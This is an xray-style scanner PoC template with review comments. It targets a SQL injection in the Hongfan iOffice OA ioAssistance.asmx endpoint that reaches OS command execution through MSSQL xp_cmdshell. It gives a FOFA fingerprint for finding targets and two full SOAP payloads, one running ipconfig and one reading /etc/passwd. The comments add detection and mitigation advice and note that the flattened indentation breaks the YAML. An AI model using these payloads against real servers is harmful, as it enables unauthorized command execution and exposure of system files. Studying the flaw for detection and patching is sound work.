漏洞描述
FOFA: app="红帆-ioffice"
# Scanner PoC template. The r0()/r1() verdict syntax and the bcontains/bmatches
# helpers look like the xray v2 PoC format -- confirm against the consumer.
# NOTE(review): every line below sits at column 0, so the nesting under
# info:/rules:/request:/headers: and the content of the three `|` block
# scalars (description, and the two bodies) is lost; as pasted this will not
# load with the intended structure. Re-indent from the referenced source file.
id: hongfan-oa-ioassistance-rce
# Metadata only. `description` repeats the FOFA fingerprint instead of
# describing the flaw; `name` is the only statement of it: a SQL injection in
# ioAssistance.asmx that reaches command execution through xp_cmdshell.
info:
name: 红帆OA ioAssistance.asmx 注入RCE
author: duan
severity: high
verified: true
description: |
FOFA: app="红帆-ioffice"
reference:
- https://github.com/FridaZhbk/pocscan/blob/ee0c74e68ec95b82a4e4ebcdb961d6ed18a44b77/%E7%BA%A2%E5%B8%86/oa%E7%BA%A2%E5%B8%86ioAssistance.asmx%E6%B3%A8%E5%85%A5RCE.py#L47
tags: hongfan,oa,rce
created: 2023/06/25
# Two probes against the same SOAP endpoint and SOAPAction; they differ only
# in the command placed in <sql> and in the response marker they look for
# (r0 expects a Windows host, r1 a Linux one). No credentials are sent, so the
# operation is presumably reachable unauthenticated -- verify before triage.
# Detection: alert on POST /ioffice/prg/set/wss/ioAssistance.asmx whose body
# carries this SOAPAction together with an `xp_cmdshell` token.
# Mitigation: the sink is the MSSQL `xp_cmdshell` procedure; disable it and
# run the application's database login without sysadmin rights so an injected
# query cannot reach it, independent of any fix to the injection itself.
rules:
# r0 -- Windows-oriented probe; a hit is a 200 whose body contains the
# ipconfig banner 'Windows IP'.
r0:
request:
method: POST
path: /ioffice/prg/set/wss/ioAssistance.asmx
headers:
Content-Type: text/xml; charset=utf-8
Soapaction: "http://tempuri.org/GetLoginedEmpNoReadedInf"
body: |
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetLoginedEmpNoReadedInf xmlns="http://tempuri.org/">
<sql>exec master.dbo.xp_cmdshell 'cmd /c ipconfig'</sql>
</GetLoginedEmpNoReadedInf>
</soap:Body>
</soap:Envelope>
expression: response.status == 200 && response.body.bcontains(b'Windows IP')
# r1 -- Linux-oriented probe; a hit is a 200 whose body matches a
# passwd-style root entry. Note the same endpoint, action and header set as r0.
r1:
request:
method: POST
path: /ioffice/prg/set/wss/ioAssistance.asmx
headers:
Content-Type: text/xml; charset=utf-8
Soapaction: "http://tempuri.org/GetLoginedEmpNoReadedInf"
body: |
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetLoginedEmpNoReadedInf xmlns="http://tempuri.org/">
<sql>exec master.dbo.xp_cmdshell '/bin/bash -c "cat /etc/passwd"'</sql>
</GetLoginedEmpNoReadedInf>
</soap:Body>
</soap:Envelope>
expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
# Top-level verdict: either probe succeeding reports the target as vulnerable;
# both markers are output of the executed command, so a match is evidence of
# execution, not merely of the injection.
expression: r0() || r1()